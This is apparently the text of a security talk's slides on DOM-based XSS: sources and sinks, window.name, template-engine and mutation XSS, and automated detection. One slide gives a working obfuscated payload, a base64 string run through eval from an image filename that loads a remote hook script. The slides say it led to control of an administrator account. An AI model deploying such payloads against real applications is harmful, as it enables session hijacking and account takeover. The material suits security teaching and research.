5. Dom XSS
A bit different kind of XSS
Attacker Payload makes change in the DOM. The
payload does not have to go to server.
The application monitoring solutions may not even
know about the issue.
Hello World in Dom XSS :
<script>
var name= document.location.hash.slice(1)
document.write(name)
</script>
6. Sources and Sinks
Source : Entry Point for untrusted data
Sink : Sink is when the untrusted data is used to
change the DOM
Fundamental problem : Data (“string”) ! Code
8. File Upload XSS
A dom XSS was found in Authenticated Section of the
Application
The Uploaded file was Changing the DOM
This was given a Low Priority bug
Reasons :
The bug is available only in the authenticated section so
only users can hack them selves.
Filenames cannot have special characters so cannot
weaponize this attack.
9. File upload XSS
<img src=a
onerror='eval2=eval;eval2(atob("eCA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnl
UYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3Jl
YXRlRWxlbWVudCgnc2NyaXB0JykpOyB4LnNyYz0naHR0cDovLzEyNy4wLjA
uMTozMjAwL2hvb2suanMn"))’>.JPG – This lead to controlling
administrator.
Application allowed power users to upload files from a
USB
JavaScript functions solved the special character problem.
Understood a unique behavior of eval()
10. Window.name
Gets/sets the name of the window.
Cross Domain Exploit
Any Sink using the tainted property can now create
DOM XSS
Yahoo Dom XSS !https://www.exploit-db.com/docs/
24109.pdf
Can be used to set global variables ! Control flow
12. JavaScript Template Engines
Data : Could be JSON
Template Engine pattern
The input is filtered and the template engine could
replace the pattern with filtered content.
Filters don’t know less prevalent bypass like Mutation
XSS
Credits : Mario Heiderich, Nafeez ahmed
https://cure53.de/fp170.pdf
13. Mutation XSS
ECMAscript String.replace is the problem
When $+”Backtick” is used it returrns the string that
precedes the matched string
Allows us to recreate a new image tag. All we need to
do the attributes.
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/
String/replace
14. How Do we Automate
Attack surface is large
The JS is compressed ugliefied
Manual verification could take time.
Flow identification is easier.
Solution : Hookish https://github.com/skepticfx/hookish